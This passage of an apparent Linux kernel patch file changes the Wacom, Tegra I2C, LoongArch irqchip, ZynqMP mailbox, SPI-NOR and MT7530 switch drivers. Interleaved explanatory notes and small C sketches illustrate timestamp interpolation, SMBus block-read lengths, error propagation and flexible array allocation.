+ 		if (wacom->tool[0]) {
+ 			input_report_abs(pen_input, ABS_PRESSURE, get_unaligned_le16(&frame[5]));
+ 			if (wacom->features.type == INTUOSP2_BT ||
+@@ -1405,6 +1428,9 @@ static void wacom_intuos_pro2_bt_pen(struct wacom_wac *wacom)
+ 
+ 		wacom->shared->stylus_in_proximity = prox;
+ 
++		/* add a per-frame timestamp to unpack the batched frames */
++		input_set_timestamp(pen_input, event_timestamp);
++
+ 		input_sync(pen_input);
+ 	}
+ }
+@@ -1895,6 +1921,7 @@ static void wacom_map_usage(struct input_dev *input, struct hid_usage *usage,
+ 	int fmax = field->logical_maximum;
+ 	unsigned int equivalent_usage = wacom_equivalent_usage(usage->hid);
+ 	int resolution_code = code;
++	int resolution = hidinput_calc_abs_res(field, resolution_code);
+ 
+ 	if (equivalent_usage == HID_DG_TWIST) {
+ 		resolution_code = ABS_RZ;
+@@ -1915,8 +1942,15 @@ static void wacom_map_usage(struct input_dev *input, struct hid_usage *usage,
+ 	switch (type) {
+ 	case EV_ABS:
+ 		input_set_abs_params(input, code, fmin, fmax, fuzz, 0);
+-		input_abs_set_res(input, code,
+-				  hidinput_calc_abs_res(field, resolution_code));
++
++		/* older tablets may be missing the physical usage */
++		if ((code == ABS_X || code == ABS_Y) && !resolution) {
++			resolution = WACOM_INTUOS_RES;
++			hid_warn(input,
++				 "Wacom usage (%d) missing resolution\n",
++				 code);
++		}
++		input_abs_set_res(input, code, resolution);
+ 		break;
+ 	case EV_KEY:
+ 	case EV_MSC:
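
The pen-frame change above spreads timestamps across the frames batched into one Bluetooth packet: the interval since the previous packet is divided by the number of valid frames and each frame is back-dated accordingly, with a 15 ms fallback for the first packet. A hedged userspace sketch of that interpolation, using plain integers in place of ktime_t (names are illustrative):

    #include <stdint.h>
    #include <stdio.h>

    static void stamp_frames(int64_t now_ns, int64_t prev_packet_ns, int nframes)
    {
        int64_t interval = 15000000;  /* 15 ms fallback, as in the patch */
        int i;

        if (nframes <= 0)
            return;
        if (prev_packet_ns)
            interval = (now_ns - prev_packet_ns) / nframes;

        for (i = 0; i < nframes; i++) {
            int remaining = nframes - i - 1;          /* frames still ahead */
            int64_t ts = now_ns - (int64_t)remaining * interval;
            printf("frame %d timestamp: %lld ns\n", i, (long long)ts);
        }
    }

    int main(void)
    {
        stamp_frames(1000000000LL, 955000000LL, 3);   /* 45 ms gap, 3 frames */
        return 0;
    }
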
+diff --git a/drivers/hid/wacom_wac.h b/drivers/hid/wacom_wac.h
+index 16f221388563d..1a40bb8c5810c 100644
+--- a/drivers/hid/wacom_wac.h
++++ b/drivers/hid/wacom_wac.h
+@@ -324,6 +324,7 @@ struct hid_data {
+ 	int ps_connected;
+ 	bool pad_input_event_flag;
+ 	unsigned short sequence_number;
++	int time_delayed;
+ };
+ 
+ struct wacom_remote_data {
+diff --git a/drivers/i2c/busses/i2c-tegra.c b/drivers/i2c/busses/i2c-tegra.c
+index 3869c258a5296..2bc40f957e509 100644
+--- a/drivers/i2c/busses/i2c-tegra.c
++++ b/drivers/i2c/busses/i2c-tegra.c
+@@ -242,9 +242,10 @@ struct tegra_i2c_hw_feature {
+  * @is_dvc: identifies the DVC I2C controller, has a different register layout
+  * @is_vi: identifies the VI I2C controller, has a different register layout
+  * @msg_complete: transfer completion notifier
++ * @msg_buf_remaining: size of unsent data in the message buffer
++ * @msg_len: length of message in current transfer
+  * @msg_err: error code for completed message
+  * @msg_buf: pointer to current message data
+- * @msg_buf_remaining: size of unsent data in the message buffer
+  * @msg_read: indicates that the transfer is a read access
+  * @timings: i2c timings information like bus frequency
+  * @multimaster_mode: indicates that I2C controller is in multi-master mode
+@@ -277,6 +278,7 @@ struct tegra_i2c_dev {
+ 
+ 	struct completion msg_complete;
+ 	size_t msg_buf_remaining;
++	unsigned int msg_len;
+ 	int msg_err;
+ 	u8 *msg_buf;
+ 
+@@ -1169,7 +1171,7 @@ static void tegra_i2c_push_packet_header(struct tegra_i2c_dev *i2c_dev,
+ 	else
+ 		i2c_writel(i2c_dev, packet_header, I2C_TX_FIFO);
+ 
+-	packet_header = msg->len - 1;
++	packet_header = i2c_dev->msg_len - 1;
+ 
+ 	if (i2c_dev->dma_mode && !i2c_dev->msg_read)
+ 		*dma_buf++ = packet_header;
+@@ -1242,20 +1244,32 @@ static int tegra_i2c_xfer_msg(struct tegra_i2c_dev *i2c_dev,
+ 		return err;
+ 
+ 	i2c_dev->msg_buf = msg->buf;
++	i2c_dev->msg_len = msg->len;
+ 
+-	/* The condition true implies smbus block read and len is already read */
+-	if (msg->flags & I2C_M_RECV_LEN && end_state != MSG_END_CONTINUE)
+-		i2c_dev->msg_buf = msg->buf + 1;
+-
+-	i2c_dev->msg_buf_remaining = msg->len;
+ 	i2c_dev->msg_err = I2C_ERR_NONE;
+ 	i2c_dev->msg_read = !!(msg->flags & I2C_M_RD);
+ 	reinit_completion(&i2c_dev->msg_complete);
+ 
++	/*
++	 * For an SMBus block read, read only 1 byte (the length) in the first
++	 * transfer. For the next transfer, skip that byte in the msg buffer
++	 * and shrink the msg length accordingly.
++	 */
++	if (msg->flags & I2C_M_RECV_LEN) {
++		if (end_state == MSG_END_CONTINUE) {
++			i2c_dev->msg_len = 1;
++		} else {
++			i2c_dev->msg_buf += 1;
++			i2c_dev->msg_len -= 1;
++		}
++	}
++
++	i2c_dev->msg_buf_remaining = i2c_dev->msg_len;
++
+ 	if (i2c_dev->msg_read)
+-		xfer_size = msg->len;
++		xfer_size = i2c_dev->msg_len;
+ 	else
+-		xfer_size = msg->len + I2C_PACKET_HEADER_SIZE;
++		xfer_size = i2c_dev->msg_len + I2C_PACKET_HEADER_SIZE;
+ 
+ 	xfer_size = ALIGN(xfer_size, BYTES_PER_FIFO_WORD);
+ 
+@@ -1295,7 +1309,7 @@ static int tegra_i2c_xfer_msg(struct tegra_i2c_dev *i2c_dev,
+ 	if (!i2c_dev->msg_read) {
+ 		if (i2c_dev->dma_mode) {
+ 			memcpy(i2c_dev->dma_buf + I2C_PACKET_HEADER_SIZE,
+-			       msg->buf, msg->len);
++			       msg->buf, i2c_dev->msg_len);
+ 
+ 			dma_sync_single_for_device(i2c_dev->dma_dev,
+ 						   i2c_dev->dma_phys,
+@@ -1352,7 +1366,7 @@ static int tegra_i2c_xfer_msg(struct tegra_i2c_dev *i2c_dev,
+ 						i2c_dev->dma_phys,
+ 						xfer_size, DMA_FROM_DEVICE);
+ 
+-			memcpy(i2c_dev->msg_buf, i2c_dev->dma_buf, msg->len);
++			memcpy(i2c_dev->msg_buf, i2c_dev->dma_buf, i2c_dev->msg_len);
+ 		}
+ 	}
+ 
+@@ -1408,8 +1422,8 @@ static int tegra_i2c_xfer(struct i2c_adapter *adap, struct i2c_msg msgs[],
+ 			ret = tegra_i2c_xfer_msg(i2c_dev, &msgs[i], MSG_END_CONTINUE);
+ 			if (ret)
+ 				break;
+-			/* Set the read byte as msg len */
+-			msgs[i].len = msgs[i].buf[0];
++			/* Add the length reported in the first byte to the msg length */
++			msgs[i].len += msgs[i].buf[0];
+ 			dev_dbg(i2c_dev->dev, "reading %d bytes\n", msgs[i].len);
+ 		}
+ 		ret = tegra_i2c_xfer_msg(i2c_dev, &msgs[i], end_type);
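
The I2C_M_RECV_LEN handling above splits an SMBus block read into a 1-byte length transfer followed by a data transfer that skips the length byte. A sketch of that bookkeeping under simplified types (field names only loosely mirror the driver):

    #include <stdio.h>

    struct xfer {
        unsigned char *buf;
        unsigned int len;
    };

    static void adjust_for_recv_len(struct xfer *x, int first_transfer)
    {
        if (first_transfer) {
            x->len = 1;        /* read just the length byte */
        } else {
            x->buf += 1;       /* data lands after the length byte */
            x->len -= 1;
        }
    }

    int main(void)
    {
        unsigned char buf[33] = { 4 };     /* device reported 4 data bytes */
        struct xfer x = { buf, 1 };

        adjust_for_recv_len(&x, 1);
        printf("first transfer reads %u byte(s)\n", x.len);

        x.len += buf[0];                   /* caller: msgs[i].len += buf[0] */
        adjust_for_recv_len(&x, 0);
        printf("second transfer reads %u data byte(s)\n", x.len);
        return 0;
    }
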
+diff --git a/drivers/irqchip/irq-loongarch-cpu.c b/drivers/irqchip/irq-loongarch-cpu.c
+index 741612ba6a520..fdec3e9cfacfb 100644
+--- a/drivers/irqchip/irq-loongarch-cpu.c
++++ b/drivers/irqchip/irq-loongarch-cpu.c
+@@ -92,18 +92,16 @@ static const struct irq_domain_ops loongarch_cpu_intc_irq_domain_ops = {
+ 	.xlate = irq_domain_xlate_onecell,
+ };
+ 
+-static int __init
+-liointc_parse_madt(union acpi_subtable_headers *header,
+-		       const unsigned long end)
++static int __init liointc_parse_madt(union acpi_subtable_headers *header,
++					const unsigned long end)
+ {
+ 	struct acpi_madt_lio_pic *liointc_entry = (struct acpi_madt_lio_pic *)header;
+ 
+ 	return liointc_acpi_init(irq_domain, liointc_entry);
+ }
+ 
+-static int __init
+-eiointc_parse_madt(union acpi_subtable_headers *header,
+-		       const unsigned long end)
++static int __init eiointc_parse_madt(union acpi_subtable_headers *header,
++					const unsigned long end)
+ {
+ 	struct acpi_madt_eio_pic *eiointc_entry = (struct acpi_madt_eio_pic *)header;
+ 
+@@ -112,16 +110,24 @@ eiointc_parse_madt(union acpi_subtable_headers *header,
+ 
+ static int __init acpi_cascade_irqdomain_init(void)
+ {
+-	acpi_table_parse_madt(ACPI_MADT_TYPE_LIO_PIC,
+-			      liointc_parse_madt, 0);
+-	acpi_table_parse_madt(ACPI_MADT_TYPE_EIO_PIC,
+-			      eiointc_parse_madt, 0);
++	int r;
++
++	r = acpi_table_parse_madt(ACPI_MADT_TYPE_LIO_PIC, liointc_parse_madt, 0);
++	if (r < 0)
++		return r;
++
++	r = acpi_table_parse_madt(ACPI_MADT_TYPE_EIO_PIC, eiointc_parse_madt, 0);
++	if (r < 0)
++		return r;
++
+ 	return 0;
+ }
+ 
+ static int __init cpuintc_acpi_init(union acpi_subtable_headers *header,
+ 				   const unsigned long end)
+ {
++	int ret;
++
+ 	if (irq_domain)
+ 		return 0;
+ 
+@@ -139,9 +145,9 @@ static int __init cpuintc_acpi_init(union acpi_subtable_headers *header,
+ 	set_handle_irq(&handle_cpu_irq);
+ 	acpi_set_irq_model(ACPI_IRQ_MODEL_LPIC, lpic_get_gsi_domain_id);
+ 	acpi_set_gsi_to_irq_fallback(lpic_gsi_to_irq);
+-	acpi_cascade_irqdomain_init();
++	ret = acpi_cascade_irqdomain_init();
+ 
+-	return 0;
++	return ret;
+ }
+ 
+ IRQCHIP_ACPI_DECLARE(cpuintc_v1, ACPI_MADT_TYPE_CORE_PIC,
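
The cpuintc change above makes acpi_cascade_irqdomain_init() propagate the first MADT-parse failure instead of discarding it, and the same pattern is applied to the eiointc and pch-pic drivers below. A trivial sketch of the pattern with simulated parse functions (illustrative, not the ACPI API):

    #include <errno.h>
    #include <stdio.h>

    static int parse_a(void) { return 0; }
    static int parse_b(void) { return -ENODEV; }   /* simulated failure */

    static int cascade_init(void)
    {
        int r;

        r = parse_a();
        if (r < 0)
            return r;          /* stop at the first failure */

        r = parse_b();
        if (r < 0)
            return r;

        return 0;
    }

    int main(void)
    {
        printf("cascade_init() = %d\n", cascade_init());   /* -19 (ENODEV) */
        return 0;
    }
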
+diff --git a/drivers/irqchip/irq-loongson-eiointc.c b/drivers/irqchip/irq-loongson-eiointc.c
+index 16e9af8d8b1ea..ac04aeaa2d308 100644
+--- a/drivers/irqchip/irq-loongson-eiointc.c
++++ b/drivers/irqchip/irq-loongson-eiointc.c
+@@ -279,9 +279,6 @@ static void acpi_set_vec_parent(int node, struct irq_domain *parent, struct acpi
+ {
+ 	int i;
+ 
+-	if (cpu_has_flatmode)
+-		node = cpu_to_node(node * CORES_PER_EIO_NODE);
+-
+ 	for (i = 0; i < MAX_IO_PICS; i++) {
+ 		if (node == vec_group[i].node) {
+ 			vec_group[i].parent = parent;
+@@ -301,9 +298,8 @@ static struct irq_domain *acpi_get_vec_parent(int node, struct acpi_vector_group
+ 	return NULL;
+ }
+ 
+-static int __init
+-pch_pic_parse_madt(union acpi_subtable_headers *header,
+-		       const unsigned long end)
++static int __init pch_pic_parse_madt(union acpi_subtable_headers *header,
++					const unsigned long end)
+ {
+ 	struct acpi_madt_bio_pic *pchpic_entry = (struct acpi_madt_bio_pic *)header;
+ 	unsigned int node = (pchpic_entry->address >> 44) & 0xf;
+@@ -312,37 +308,51 @@ pch_pic_parse_madt(union acpi_subtable_headers *header,
+ 	if (parent)
+ 		return pch_pic_acpi_init(parent, pchpic_entry);
+ 
+-	return -EINVAL;
++	return 0;
+ }
+ 
+-static int __init
+-pch_msi_parse_madt(union acpi_subtable_headers *header,
+-		       const unsigned long end)
++static int __init pch_msi_parse_madt(union acpi_subtable_headers *header,
++					const unsigned long end)
+ {
++	struct irq_domain *parent;
+ 	struct acpi_madt_msi_pic *pchmsi_entry = (struct acpi_madt_msi_pic *)header;
+-	struct irq_domain *parent = acpi_get_vec_parent(eiointc_priv[nr_pics - 1]->node, msi_group);
++	int node;
++
++	if (cpu_has_flatmode)
++		node = cpu_to_node(eiointc_priv[nr_pics - 1]->node * CORES_PER_EIO_NODE);
++	else
++		node = eiointc_priv[nr_pics - 1]->node;
++
++	parent = acpi_get_vec_parent(node, msi_group);
+ 
+ 	if (parent)
+ 		return pch_msi_acpi_init(parent, pchmsi_entry);
+ 
+-	return -EINVAL;
++	return 0;
+ }
+ 
+ static int __init acpi_cascade_irqdomain_init(void)
+ {
+-	acpi_table_parse_madt(ACPI_MADT_TYPE_BIO_PIC,
+-			      pch_pic_parse_madt, 0);
+-	acpi_table_parse_madt(ACPI_MADT_TYPE_MSI_PIC,
+-			      pch_msi_parse_madt, 1);
++	int r;
++
++	r = acpi_table_parse_madt(ACPI_MADT_TYPE_BIO_PIC, pch_pic_parse_madt, 0);
++	if (r < 0)
++		return r;
++
++	r = acpi_table_parse_madt(ACPI_MADT_TYPE_MSI_PIC, pch_msi_parse_madt, 1);
++	if (r < 0)
++		return r;
++
+ 	return 0;
+ }
+ 
+ int __init eiointc_acpi_init(struct irq_domain *parent,
+ 				     struct acpi_madt_eio_pic *acpi_eiointc)
+ {
+-	int i, parent_irq;
++	int i, ret, parent_irq;
+ 	unsigned long node_map;
+ 	struct eiointc_priv *priv;
++	int node;
+ 
+ 	priv = kzalloc(sizeof(*priv), GFP_KERNEL);
+ 	if (!priv)
+@@ -380,15 +390,21 @@ int __init eiointc_acpi_init(struct irq_domain *parent,
+ 	parent_irq = irq_create_mapping(parent, acpi_eiointc->cascade);
+ 	irq_set_chained_handler_and_data(parent_irq, eiointc_irq_dispatch, priv);
+ 
+-	cpuhp_setup_state_nocalls(CPUHP_AP_IRQ_LOONGARCH_STARTING,
++	if (nr_pics == 1) {
++		cpuhp_setup_state_nocalls(CPUHP_AP_IRQ_LOONGARCH_STARTING,
+ 				  "irqchip/loongarch/intc:starting",
+ 				  eiointc_router_init, NULL);
++	}
+ 
+-	acpi_set_vec_parent(acpi_eiointc->node, priv->eiointc_domain, pch_group);
+-	acpi_set_vec_parent(acpi_eiointc->node, priv->eiointc_domain, msi_group);
+-	acpi_cascade_irqdomain_init();
+-
+-	return 0;
++	if (cpu_has_flatmode)
++		node = cpu_to_node(acpi_eiointc->node * CORES_PER_EIO_NODE);
++	else
++		node = acpi_eiointc->node;
++	acpi_set_vec_parent(node, priv->eiointc_domain, pch_group);
++	acpi_set_vec_parent(node, priv->eiointc_domain, msi_group);
++	ret = acpi_cascade_irqdomain_init();
++
++	return ret;
+ 
+ out_free_handle:
+ 	irq_domain_free_fwnode(priv->domain_handle);
+diff --git a/drivers/irqchip/irq-loongson-pch-pic.c b/drivers/irqchip/irq-loongson-pch-pic.c
+index 03493cda65a37..679e2b68e6e9d 100644
+--- a/drivers/irqchip/irq-loongson-pch-pic.c
++++ b/drivers/irqchip/irq-loongson-pch-pic.c
+@@ -328,9 +328,8 @@ int find_pch_pic(u32 gsi)
+ 	return -1;
+ }
+ 
+-static int __init
+-pch_lpc_parse_madt(union acpi_subtable_headers *header,
+-		       const unsigned long end)
++static int __init pch_lpc_parse_madt(union acpi_subtable_headers *header,
++					const unsigned long end)
+ {
+ 	struct acpi_madt_lpc_pic *pchlpc_entry = (struct acpi_madt_lpc_pic *)header;
+ 
+@@ -339,8 +338,12 @@ pch_lpc_parse_madt(union acpi_subtable_headers *header,
+ 
+ static int __init acpi_cascade_irqdomain_init(void)
+ {
+-	acpi_table_parse_madt(ACPI_MADT_TYPE_LPC_PIC,
+-			      pch_lpc_parse_madt, 0);
++	int r;
++
++	r = acpi_table_parse_madt(ACPI_MADT_TYPE_LPC_PIC, pch_lpc_parse_madt, 0);
++	if (r < 0)
++		return r;
++
+ 	return 0;
+ }
+ 
+@@ -350,6 +353,9 @@ int __init pch_pic_acpi_init(struct irq_domain *parent,
+ 	int ret, vec_base;
+ 	struct fwnode_handle *domain_handle;
+ 
++	if (find_pch_pic(acpi_pchpic->gsi_base) >= 0)
++		return 0;
++
+ 	vec_base = acpi_pchpic->gsi_base - GSI_MIN_PCH_IRQ;
+ 
+ 	domain_handle = irq_domain_alloc_fwnode(&acpi_pchpic->address);
+@@ -367,7 +373,7 @@ int __init pch_pic_acpi_init(struct irq_domain *parent,
+ 	}
+ 
+ 	if (acpi_pchpic->id == 0)
+-		acpi_cascade_irqdomain_init();
++		ret = acpi_cascade_irqdomain_init();
+ 
+ 	return ret;
+ }
+diff --git a/drivers/mailbox/zynqmp-ipi-mailbox.c b/drivers/mailbox/zynqmp-ipi-mailbox.c
+index e02a4a18e8c29..d097f45b0e5f5 100644
+--- a/drivers/mailbox/zynqmp-ipi-mailbox.c
++++ b/drivers/mailbox/zynqmp-ipi-mailbox.c
+@@ -110,7 +110,7 @@ struct zynqmp_ipi_pdata {
+ 	unsigned int method;
+ 	u32 local_id;
+ 	int num_mboxes;
+-	struct zynqmp_ipi_mbox *ipi_mboxes;
++	struct zynqmp_ipi_mbox ipi_mboxes[];
+ };
+ 
+ static struct device_driver zynqmp_ipi_mbox_driver = {
+@@ -634,8 +634,13 @@ static int zynqmp_ipi_probe(struct platform_device *pdev)
+ 	struct zynqmp_ipi_mbox *mbox;
+ 	int num_mboxes, ret = -EINVAL;
+ 
+-	num_mboxes = of_get_child_count(np);
+-	pdata = devm_kzalloc(dev, sizeof(*pdata) + (num_mboxes * sizeof(*mbox)),
++	num_mboxes = of_get_available_child_count(np);
++	if (num_mboxes == 0) {
++		dev_err(dev, "mailbox nodes not available\n");
++		return -EINVAL;
++	}
++
++	pdata = devm_kzalloc(dev, struct_size(pdata, ipi_mboxes, num_mboxes),
+ 			     GFP_KERNEL);
+ 	if (!pdata)
+ 		return -ENOMEM;
+@@ -649,8 +654,6 @@ static int zynqmp_ipi_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	pdata->num_mboxes = num_mboxes;
+-	pdata->ipi_mboxes = (struct zynqmp_ipi_mbox *)
+-			    ((char *)pdata + sizeof(*pdata));
+ 
+ 	mbox = pdata->ipi_mboxes;
+ 	for_each_available_child_of_node(np, nc) {
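
The zynqmp-ipi change above converts the trailing mailbox array into a C99 flexible array member sized with struct_size(), replacing the manual "cast past the end of the struct" arithmetic. A standalone sketch of the same layout, where calloc stands in for devm_kzalloc and the plain size expression for the overflow-checked struct_size():

    #include <stdio.h>
    #include <stdlib.h>

    struct mbox { int id; };

    struct pdata {
        int num_mboxes;
        struct mbox ipi_mboxes[];   /* flexible array member */
    };

    int main(void)
    {
        int n = 4;
        /* kernel code would use struct_size(pdata, ipi_mboxes, n) */
        struct pdata *p = calloc(1, sizeof(*p) + n * sizeof(struct mbox));

        if (!p)
            return 1;
        p->num_mboxes = n;
        p->ipi_mboxes[3].id = 42;   /* indexable without manual casts */
        printf("mbox 3 id = %d\n", p->ipi_mboxes[3].id);
        free(p);
        return 0;
    }
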
+diff --git a/drivers/mtd/spi-nor/core.c b/drivers/mtd/spi-nor/core.c
+index 9a7bea365acb7..dc4d86ceee447 100644
+--- a/drivers/mtd/spi-nor/core.c
++++ b/drivers/mtd/spi-nor/core.c
+@@ -2440,6 +2440,9 @@ static void spi_nor_init_flags(struct spi_nor *nor)
+ 
+ 	if (flags & NO_CHIP_ERASE)
+ 		nor->flags |= SNOR_F_NO_OP_CHIP_ERASE;
++
++	if (flags & SPI_NOR_RWW)
++		nor->flags |= SNOR_F_RWW;
+ }
+ 
+ /**
+@@ -2578,6 +2581,12 @@ static void spi_nor_init_default_params(struct spi_nor *nor)
+ 	params->hwcaps.mask |= SNOR_HWCAPS_PP;
+ 	spi_nor_set_pp_settings(&params->page_programs[SNOR_CMD_PP],
+ 				SPINOR_OP_PP, SNOR_PROTO_1_1_1);
++
++	if (info->flags & SPI_NOR_QUAD_PP) {
++		params->hwcaps.mask |= SNOR_HWCAPS_PP_1_1_4;
++		spi_nor_set_pp_settings(&params->page_programs[SNOR_CMD_PP_1_1_4],
++					SPINOR_OP_PP_1_1_4, SNOR_PROTO_1_1_4);
++	}
+ }
+ 
+ /**
+@@ -2933,6 +2942,9 @@ static void spi_nor_set_mtd_info(struct spi_nor *nor)
+ 		mtd->name = dev_name(dev);
+ 	mtd->type = MTD_NORFLASH;
+ 	mtd->flags = MTD_CAP_NORFLASH;
++	/* Unset BIT_WRITEABLE to enable JFFS2 write buffer for ECC'd NOR */
++	if (nor->flags & SNOR_F_ECC)
++		mtd->flags &= ~MTD_BIT_WRITEABLE;
+ 	if (nor->info->flags & SPI_NOR_NO_ERASE)
+ 		mtd->flags |= MTD_NO_ERASE;
+ 	else
+diff --git a/drivers/mtd/spi-nor/core.h b/drivers/mtd/spi-nor/core.h
+index 00bf0d0e955a0..290613fd63ae7 100644
+--- a/drivers/mtd/spi-nor/core.h
++++ b/drivers/mtd/spi-nor/core.h
+@@ -130,6 +130,8 @@ enum spi_nor_option_flags {
+ 	SNOR_F_IO_MODE_EN_VOLATILE = BIT(11),
+ 	SNOR_F_SOFT_RESET	= BIT(12),
+ 	SNOR_F_SWP_IS_VOLATILE	= BIT(13),
++	SNOR_F_RWW		= BIT(14),
++	SNOR_F_ECC		= BIT(15),
+ };
+ 
+ struct spi_nor_read_command {
+@@ -458,6 +460,8 @@ struct spi_nor_fixups {
+  *   SPI_NOR_NO_ERASE:        no erase command needed.
+  *   NO_CHIP_ERASE:           chip does not support chip erase.
+  *   SPI_NOR_NO_FR:           can't do fastread.
++ *   SPI_NOR_QUAD_PP:         flash supports Quad Input Page Program.
++ *   SPI_NOR_RWW:             flash supports reads while write.
+  *
+  * @no_sfdp_flags:  flags that indicate support that can be discovered via SFDP.
+  *                  Used when SFDP tables are not defined in the flash. These
+@@ -507,6 +511,8 @@ struct flash_info {
+ #define SPI_NOR_NO_ERASE		BIT(6)
+ #define NO_CHIP_ERASE			BIT(7)
+ #define SPI_NOR_NO_FR			BIT(8)
++#define SPI_NOR_QUAD_PP			BIT(9)
++#define SPI_NOR_RWW			BIT(10)
+ 
+ 	u8 no_sfdp_flags;
+ #define SPI_NOR_SKIP_SFDP		BIT(0)
+diff --git a/drivers/mtd/spi-nor/debugfs.c b/drivers/mtd/spi-nor/debugfs.c
+index 5f56b23205d8b..6d6bd559db8fd 100644
+--- a/drivers/mtd/spi-nor/debugfs.c
++++ b/drivers/mtd/spi-nor/debugfs.c
+@@ -25,6 +25,8 @@ static const char *const snor_f_names[] = {
+ 	SNOR_F_NAME(IO_MODE_EN_VOLATILE),
+ 	SNOR_F_NAME(SOFT_RESET),
+ 	SNOR_F_NAME(SWP_IS_VOLATILE),
++	SNOR_F_NAME(RWW),
++	SNOR_F_NAME(ECC),
+ };
+ #undef SNOR_F_NAME
+ 
+diff --git a/drivers/mtd/spi-nor/issi.c b/drivers/mtd/spi-nor/issi.c
+index 89a66a19d754f..7c8eee808dda6 100644
+--- a/drivers/mtd/spi-nor/issi.c
++++ b/drivers/mtd/spi-nor/issi.c
+@@ -73,6 +73,7 @@ static const struct flash_info issi_nor_parts[] = {
+ 	{ "is25wp256", INFO(0x9d7019, 0, 64 * 1024, 512)
+ 		NO_SFDP_FLAGS(SECT_4K | SPI_NOR_DUAL_READ | SPI_NOR_QUAD_READ)
+ 		FIXUP_FLAGS(SPI_NOR_4B_OPCODES)
++		FLAGS(SPI_NOR_QUAD_PP)
+ 		.fixups = &is25lp256_fixups },
+ 
+ 	/* PMC */
+diff --git a/drivers/mtd/spi-nor/spansion.c b/drivers/mtd/spi-nor/spansion.c
+index 7ac2ad1a8d576..7e7c68fc7776d 100644
+--- a/drivers/mtd/spi-nor/spansion.c
++++ b/drivers/mtd/spi-nor/spansion.c
+@@ -212,6 +212,17 @@ static int cypress_nor_set_page_size(struct spi_nor *nor)
+ 	return 0;
+ }
+ 
++static void cypress_nor_ecc_init(struct spi_nor *nor)
++{
++	/*
++	 * Programming is supported only in 16-byte ECC data unit granularity.
++	 * Byte-programming, bit-walking, or multiple program operations to the
++	 * same ECC data unit without an erase are not allowed.
++	 */
++	nor->params->writesize = 16;
++	nor->flags |= SNOR_F_ECC;
++}
++
+ static int
+ s25hx_t_post_bfpt_fixup(struct spi_nor *nor,
+ 			const struct sfdp_parameter_header *bfpt_header,
+@@ -249,13 +260,10 @@ static void s25hx_t_post_sfdp_fixup(struct spi_nor *nor)
+ 
+ static void s25hx_t_late_init(struct spi_nor *nor)
+ {
+-	struct spi_nor_flash_parameter *params = nor->params;
+-
+ 	/* Fast Read 4B requires mode cycles */
+-	params->reads[SNOR_CMD_READ_FAST].num_mode_clocks = 8;
++	nor->params->reads[SNOR_CMD_READ_FAST].num_mode_clocks = 8;
+ 
+-	/* The writesize should be ECC data unit size */
+-	params->writesize = 16;
++	cypress_nor_ecc_init(nor);
+ }
+ 
+ static struct spi_nor_fixups s25hx_t_fixups = {
+@@ -280,12 +288,6 @@ static int cypress_nor_octal_dtr_enable(struct spi_nor *nor, bool enable)
+ 			cypress_nor_octal_dtr_dis(nor);
+ }
+ 
+-static void s28hs512t_default_init(struct spi_nor *nor)
+-{
+-	nor->params->octal_dtr_enable = cypress_nor_octal_dtr_enable;
+-	nor->params->writesize = 16;
+-}
+-
+ static void s28hs512t_post_sfdp_fixup(struct spi_nor *nor)
+ {
+ 	/*
+@@ -321,10 +323,16 @@ static int s28hs512t_post_bfpt_fixup(struct spi_nor *nor,
+ 	return cypress_nor_set_page_size(nor);
+ }
+ 
++static void s28hs512t_late_init(struct spi_nor *nor)
++{
++	nor->params->octal_dtr_enable = cypress_nor_octal_dtr_enable;
++	cypress_nor_ecc_init(nor);
++}
++
+ static const struct spi_nor_fixups s28hs512t_fixups = {
+-	.default_init = s28hs512t_default_init,
+ 	.post_sfdp = s28hs512t_post_sfdp_fixup,
+ 	.post_bfpt = s28hs512t_post_bfpt_fixup,
++	.late_init = s28hs512t_late_init,
+ };
+ 
+ static int
+@@ -459,8 +467,7 @@ static const struct flash_info spansion_nor_parts[] = {
+ 	{ "cy15x104q",  INFO6(0x042cc2, 0x7f7f7f, 512 * 1024, 1)
+ 		FLAGS(SPI_NOR_NO_ERASE) },
+ 	{ "s28hs512t",   INFO(0x345b1a,      0, 256 * 1024, 256)
+-		NO_SFDP_FLAGS(SECT_4K | SPI_NOR_OCTAL_DTR_READ |
+-			      SPI_NOR_OCTAL_DTR_PP)
++		PARSE_SFDP
+ 		.fixups = &s28hs512t_fixups,
+ 	},
+ };
+diff --git a/drivers/net/dsa/mt7530.c b/drivers/net/dsa/mt7530.c
+index 38bf760b5b5ee..855220c5ce339 100644
+--- a/drivers/net/dsa/mt7530.c
++++ b/drivers/net/dsa/mt7530.c
+@@ -446,9 +446,9 @@ mt7530_pad_clk_setup(struct dsa_switch *ds, phy_interface_t interface)
+ 		else
+ 			ssc_delta = 0x87;
+ 		if (priv->id == ID_MT7621) {
+-			/* PLL frequency: 150MHz: 1.2GBit */
++			/* PLL frequency: 125MHz: 1.0GBit */
+ 			if (xtal == HWTRAP_XTAL_40MHZ)
+-				ncpo1 = 0x0780;
++				ncpo1 = 0x0640;
+ 			if (xtal == HWTRAP_XTAL_25MHZ)
+ 				ncpo1 = 0x0a00;
+ 		} else { /* PLL frequency: 250MHz: 2.0Gbit */
+@@ -1015,9 +1015,9 @@ mt753x_cpu_port_enable(struct dsa_switch *ds, int port)
+ 	mt7530_write(priv, MT7530_PVC_P(port),
+ 		     PORT_SPEC_TAG);
+ 
+-	/* Disable flooding by default */
+-	mt7530_rmw(priv, MT7530_MFC, BC_FFP_MASK | UNM_FFP_MASK | UNU_FFP_MASK,
+-		   BC_FFP(BIT(port)) | UNM_FFP(BIT(port)) | UNU_FFP(BIT(port)));
++	/* Enable flooding on the CPU port */
++	mt7530_set(priv, MT7530_MFC, BC_FFP(BIT(port)) | UNM_FFP(BIT(port)) |
++		   UNU_FFP(BIT(port)));
+ 
+ 	/* Set CPU port number */
+ 	if (priv->id == ID_MT7621)
+@@ -2312,12 +2312,69 @@ mt7530_setup(struct dsa_switch *ds)
+ 	return 0;
+ }
+ 
++static int
++mt7531_setup_common(struct dsa_switch *ds)
++{
++	struct mt7530_priv *priv = ds->priv;
++	struct dsa_port *cpu_dp;
++	int ret, i;
++
++	/* BPDU to CPU port */
++	dsa_switch_for_each_cpu_port(cpu_dp, ds) {
++		mt7530_rmw(priv, MT7531_CFC, MT7531_CPU_PMAP_MASK,
++			   BIT(cpu_dp->index));
++		break;
++	}
++	mt7530_rmw(priv, MT753X_BPC, MT753X_BPDU_PORT_FW_MASK,
++		   MT753X_BPDU_CPU_ONLY);
++
++	/* Enable and reset MIB counters */
++	mt7530_mib_reset(ds);
++
++	/* Disable flooding on all ports */
++	mt7530_clear(priv, MT7530_MFC, BC_FFP_MASK | UNM_FFP_MASK |
++		     UNU_FFP_MASK);
++
++	for (i = 0; i < MT7530_NUM_PORTS; i++) {
